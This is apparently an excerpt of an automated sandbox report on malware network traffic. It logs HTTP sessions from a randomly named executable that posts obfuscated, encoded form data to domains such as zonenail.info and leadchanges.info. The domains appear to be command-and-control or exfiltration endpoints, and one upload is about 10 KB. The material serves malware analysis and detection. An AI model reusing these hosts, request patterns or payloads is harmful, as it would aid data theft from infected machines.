                                                                            Data Raw: 74 46 31 74 6b 36 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 35 30 6a 61 6e 4c 73 49 35 50 71 79 50 50 35 52 42 41 54 48 61 64 31 65 4c 4b 43 4d 76 44 36 4f 49 70 31 47 48 64 65 30 35 6f 48 53 36 42 42 78 78 4d 77 6a 7a 49 69 4e 61 31 4d 50 4b 44 74 74 41 4b 4d 66 7a 4e 79 51 68 70 34 6a 43 39 57 34 6d 37 47 2b 7a 38 54 4f 6d 57 64 39 5a 4f 35 44 6a 57 54 2b 67 33 49 74 57 33 48 46 37 54 79 73 54 32 71 47 69 79 4d 64 42 6a 6f 4c 4c 4d 57 75 2b 6d 76 52 56 48 36 32 30 30 6d 6c 42 6b 61 51 79 7a 6b 73 78 4f 30 37 55 77 31 49 6f 4f 71 50 4c 57 39 30 64 38 59 36 72 50 44 61 56 49 67 30 64 59 71 65 4b 66 4d 4e 57 6d 50 45 4a 44 30 68 55 64 51 78 4f 45 6f 51 69 66 38 67 49 54 68 65 37 78 78 65 4b 33 64 63 78 78 41 55 6c 58 4d 35 73 68 6d 44 6b 37 57 6e 75 31 44 6f 53 6e 58 6a 47 76 43 6e 52 34 33 74 47 4a 67 41 65 69 62 66 7a 68 72 35 76 38 43 2f 55 74 46 48 46 42 41 68 6e 37 46 35 45 46 42 61 6e 59 55 65 47 6a 65 6d 65 61 4c 59 4b 56 64 45 77 43 46 2f 2f 74 62 43 72 78 65 37 79 34 4d 4e 6b 78 4e 4b 42 6e 42 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=LWibrjoHVkt650janLsI5PqyPP5RBATHad1eLKCMvD6OIp1GHde05oHS6BBxxMwjzIiNa1MPKDttAKMfzNyQhp4jC9W4m7G+z8TOmWd9ZO5DjWT+g3ItW3HF7TysT2qGiyMdBjoLLMWu+mvRVH6200mlBkaQyzksxO07Uw1IoOqPLW90d8Y6rPDaVIg0dYqeKfMNWmPEJD0hUdQxOEoQif8gIThe7xxeK3dcxxAUlXM5shmDk7Wnu1DoSnXjGvCnR43tGJgAeibfzhr5v8C/UtFHFBAhn7F5EFBanYUeGjemeaLYKVdEwCF//tbCrxe7y4MNkxNKBnB3N3W5vTJWHNoUA/LWH1JcOSjho5lY6/TRMEuEyc3mprQUQkkShTHpQLHfDUvStjsDUPdbxCfXtQLtL9BUgkv8ImqUzFGEBz5MqxFiV30dwq/7Kb95/RHceKzEmxchKc7WUQM/7uAjiAcyeOQkxi3xjFFom5oX2Ge0/DBznZSRs+NI6lYtAcFX4oggkzXWQVYFX5ARRleVHW5EydoFonVExdXqrUYFzdTV0dZHV1nCDb/RyCDENPGfkPtAA9wcTygdK13S9M5FoFy+g20I7lOoWpjVVLPq/0FQdeaRIav9PH73Jl+Mf2PHWWxEP5fzHg1bsPFj6a69RA6vNkMVSkmikfG14ibaP+RwyCGx5Ye5ZYSgO7bQOjkUPOBD4uCupAl/R1EmfvL9+u/452/n22h+wP/5mlJoNTafN/gPOh2ZnAktdNDHGoAABVkay8JfPbVzJZ7ZccQJLHNBozMuQ4233MErFnLNsQqyq0JvadngclK0Kc4qP0byHjNw1PWnQImM3PtJQl9KQOQ3G2SUX0kiYdT5SGvjPbA4Iiv3CWfucyknrbIfxGp6FBNhuYjYnKU/bbay0cLNKNgUI/3F0jgGojdRtFd3nhcAFXUIUeTIsLNz4fQrlBw0acvCX+T5RxXzCgjepa3BeUUdponLiF8mA66KZ7hkC1BTV [TRUNCATED]
                                                                            Jun 19, 2024 22:41:51.661393881 CEST1087INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            50192.168.2.44979466.29.145.248801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:51.953722954 CEST780OUTPOST /kscn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.zonenail.info
                                                                            Referer: http://www.zonenail.info/kscn/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Raw: 67 68 65 50 31 44 58 3d 50 59 78 46 76 41 66 61 41 48 56 63 64 6b 51 33 6b 74 6f 2f 77 69 6e 55 39 45 32 4a 49 51 61 6d 39 48 34 78 5a 6c 68 4b 42 5a 76 67 64 6f 4d 57 30 74 54 48 74 73 49 64 48 6e 75 4f 77 68 68 6b 51 66 61 35 71 59 65 77 58 7a 48 46 72 65 33 49 62 43 69 4f 61 65 44 4e 6d 76 44 34 4d 5a 61 6c 70 6b 36 73 57 50 73 4e 51 36 58 4d 49 55 39 59 75 79 61 38 74 64 77 56 78 68 72 4c 69 62 72 7a 34 4c 73 75 7a 52 42 63 6d 6a 31 6f 52 70 5a 51 57 69 37 4b 6b 71 4b 2f 70 67 7a 53 78 71 4f 59 74 61 78 4a 4d 32 50 73 4b 36 36 68 39 2f 72 78 53 48 64 43 55 33 33 58 48 6c 4a 7a 47 4f 31 71 6d 51 3d 3d
                                                                            Data Ascii: gheP1DX=PYxFvAfaAHVcdkQ3kto/winU9E2JIQam9H4xZlhKBZvgdoMW0tTHtsIdHnuOwhhkQfa5qYewXzHFre3IbCiOaeDNmvD4MZalpk6sWPsNQ6XMIU9Yuya8tdwVxhrLibrz4LsuzRBcmj1oRpZQWi7KkqK/pgzSxqOYtaxJM2PsK66h9/rxSHdCU33XHlJzGO1qmQ==
                                                                            Jun 19, 2024 22:41:52.564507008 CEST533INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:52 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            51192.168.2.44979566.96.162.149805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:53.074821949 CEST435OUTGET /mjuo/?tF1tk6=GUK7oVIRF3FAoVitmIo24b7mQO1KNg79CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWshYAEM4vq2qW4/efVo1EPE/sR7lHPgRI0Ri4=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:53.542373896 CEST1087INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 0
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            52192.168.2.44979666.29.145.248801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:54.484353065 CEST800OUTPOST /kscn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.zonenail.info
                                                                            Referer: http://www.zonenail.info/kscn/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Raw: 67 68 65 50 31 44 58 3d 50 59 78 46 76 41 66 61 41 48 56 63 66 45 67 33 70 71 38 2f 33 43 6e 62 68 30 32 4a 47 77 61 63 39 48 30 78 5a 67 5a 61 43 76 66 67 64 49 38 57 6d 73 54 48 6b 38 49 64 50 48 75 4c 74 78 68 37 51 66 57 62 71 64 6d 77 58 7a 37 46 72 66 48 49 62 78 36 42 63 4f 44 50 79 66 44 2b 53 70 61 6c 70 6b 36 73 57 50 6f 72 51 36 50 4d 49 6b 74 59 76 58 33 71 75 64 77 53 79 68 72 4c 6f 37 72 6f 34 4c 74 37 7a 52 78 36 6d 68 64 6f 52 74 64 51 56 78 6a 4e 39 61 4b 31 32 51 79 63 79 36 2b 52 31 4a 64 4a 54 6b 4c 55 42 36 79 44 31 5a 36 72 44 32 38 56 47 33 54 6b 61 69 41 48 4c 4e 49 6a 39 61 58 62 35 73 32 32 50 61 49 74 51 34 72 4f 59 72 6b 69 42 53 6b 3d
                                                                            Data Ascii: gheP1DX=PYxFvAfaAHVcfEg3pq8/3Cnbh02JGwac9H0xZgZaCvfgdI8WmsTHk8IdPHuLtxh7QfWbqdmwXz7FrfHIbx6BcODPyfD+Spalpk6sWPorQ6PMIktYvX3qudwSyhrLo7ro4Lt7zRx6mhdoRtdQVxjN9aK12Qycy6+R1JdJTkLUB6yD1Z6rD28VG3TkaiAHLNIj9aXb5s22PaItQ4rOYrkiBSk=
                                                                            Jun 19, 2024 22:41:55.095652103 CEST533INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:55 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            53192.168.2.44979766.29.145.248801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:57.013468027 CEST10882OUTPOST /kscn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Content-Length: 10304
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.zonenail.info
                                                                            Referer: http://www.zonenail.info/kscn/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Raw: 67 68 65 50 31 44 58 3d 50 59 78 46 76 41 66 61 41 48 56 63 66 45 67 33 70 71 38 2f 33 43 6e 62 68 30 32 4a 47 77 61 63 39 48 30 78 5a 67 5a 61 43 76 58 67 64 62 45 57 6c 50 72 48 2b 38 49 64 42 6e 75 4b 74 78 68 32 51 65 2b 66 71 63 61 61 58 32 33 46 71 39 50 49 64 41 36 42 53 4f 44 50 74 50 44 37 4d 5a 61 56 70 6b 71 6f 57 50 34 72 51 36 50 4d 49 68 70 59 6f 43 62 71 69 39 77 56 78 68 72 58 69 62 71 48 34 4b 45 41 7a 56 74 4d 6e 52 39 6f 51 4a 35 51 61 69 48 4e 30 61 4b 7a 33 51 7a 42 79 36 7a 4a 31 49 77 79 54 6c 76 79 42 34 75 44 77 64 33 67 52 56 51 70 45 31 6d 2b 50 46 68 69 53 39 49 44 36 64 6e 44 36 4f 4f 44 4d 76 6f 59 62 61 58 41 64 34 39 6a 64 6d 4d 57 62 73 6a 43 6e 77 51 34 77 70 79 75 2f 59 51 70 46 44 78 59 67 77 79 41 71 4c 57 36 67 6e 32 32 74 51 31 6d 64 79 77 78 4e 34 7a 62 63 6c 75 4e 66 34 79 4b 4c 46 51 49 6c 49 6f 4d 7a 46 32 4c 38 43 4e 78 2f 55 46 72 65 65 72 66 35 69 59 78 68 79 34 39 48 63 4e 6b 51 54 59 36 79 6f 38 58 6f 4e 4e 33 6f 37 39 61 70 5a 4a 76 6a 52 58 71 47 71 [TRUNCATED]
                                                                            Data Ascii: gheP1DX=PYxFvAfaAHVcfEg3pq8/3Cnbh02JGwac9H0xZgZaCvXgdbEWlPrH+8IdBnuKtxh2Qe+fqcaaX23Fq9PIdA6BSODPtPD7MZaVpkqoWP4rQ6PMIhpYoCbqi9wVxhrXibqH4KEAzVtMnR9oQJ5QaiHN0aKz3QzBy6zJ1IwyTlvyB4uDwd3gRVQpE1m+PFhiS9ID6dnD6OODMvoYbaXAd49jdmMWbsjCnwQ4wpyu/YQpFDxYgwyAqLW6gn22tQ1mdywxN4zbcluNf4yKLFQIlIoMzF2L8CNx/UFreerf5iYxhy49HcNkQTY6yo8XoNN3o79apZJvjRXqGqfywjLnPMQwi/MeobAsF0+JQNC8dSlEKqJeOtNRP9LuEJEh4+vtHZJYNUPjmcvZ5+C4XFYlQTkr41t5L+9N5EnkBzNMMqjZU3CgDo6NgROf8gEygAxhjShS4AgaKJCKtMx7qHMSIuhaVa+cXlnOnRbvRezcYGMelrxSZo041cnkuS3b2OiiaemPA9GxkXS5HXgxJQ31xjd5y5zThe2qIBiwSYg8TkEYlXcbUrSn7ctxju0Fd4eMc9+TaeWgzeVAU7qFCSeV5dws3mXdll+X+YT9WdDuQxkNN3ZifQ3gjOox5UvaaeXSP/yESWq07GdcEfs0sWRQZVHYLCPtYAI6fRkXcryNRXuAEjIxo4oXjIfwDb3Sqn2Kq4DGpbIHe3PZbWbLL4hr4d0fcOtwkIsGHtvKUYIA6hUVRARnmRNfcc7XIyNmJfz6H3ulXkM8kihCoso0O+NLLm2Be3k+dexpia8ntyv+6anvU/jmnB3DTbvqFFvN5mwtP16LYAfAzZ1IsrfN1gQKHhUKR/MLdDuQjQcGc8w9fTuBT8HUBGTxcZ5eY5yow7UhhOQi1wrWBn31ahR+FuoqMW8Zdo37tEWmNCgjqW/qAP0qukqE0k0B4Z+olG8bKp+24pa28M5yjG+nPr4ymMTCPK7sm1420ObOBTLCZuxnOdLH8PnE [TRUNCATED]
                                                                            Jun 19, 2024 22:41:57.704416037 CEST533INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:57 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            54192.168.2.44979866.29.145.248801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:59.543504953 CEST515OUTGET /kscn/?gheP1DX=CaZls2vsCC5SEDZO9v0TsRD/xR3TWESK018fdyQAavLwN8o4xbvFproXKVSs0R5JJuiJmc+bWHrVqZCkdQKET8aXg+bTbKyQsViJTM4/a4CXWVNH2Hn1tMo=&QTth=cdSXMBmhjDz HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:42:00.144364119 CEST548INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:42:00 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            55192.168.2.449800195.35.39.11980
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:42:07.668524981 CEST705OUTPOST /l4k7/ HTTP/1.1
                                                                            Host: www.futuregainers.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
